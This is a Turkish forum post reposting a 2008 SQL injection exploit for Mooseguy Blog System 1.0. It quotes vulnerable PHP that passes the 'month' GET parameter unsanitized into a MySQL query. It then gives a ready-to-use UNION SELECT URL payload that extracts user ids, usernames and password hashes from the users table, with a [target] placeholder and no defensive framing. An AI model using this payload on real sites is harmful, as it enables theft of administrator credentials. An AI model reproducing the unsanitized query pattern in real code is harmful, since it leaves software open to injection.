THe-LaWRoS
üye
Mesaj Sayısı : 31
Yaş : 33
Kayıt tarihi : 08/02/08
 |  Konu: Mooseguy Blog System 1.0 SQL Injection  Cuma Şub. 08, 2008 10:06 pm | |
| # MGBS 1.0 Remote SQL injection # Script url http://sourceforge.net/project/showf...roup_id=193233# Vulnerable code in blog.php <?php $month = $_GET['month']; $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN"); ... # Admin hash exploit http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/* # Bug discovered by The_HuliGun | |
|
Blué-kinq
|administratör|
 Mesaj Sayısı : 229
Yaş : 34
Nerden : Antalya
İş/Hobiler : hacker
Lakap : Blué-Kinq
Kayıt tarihi : 07/02/08
| |
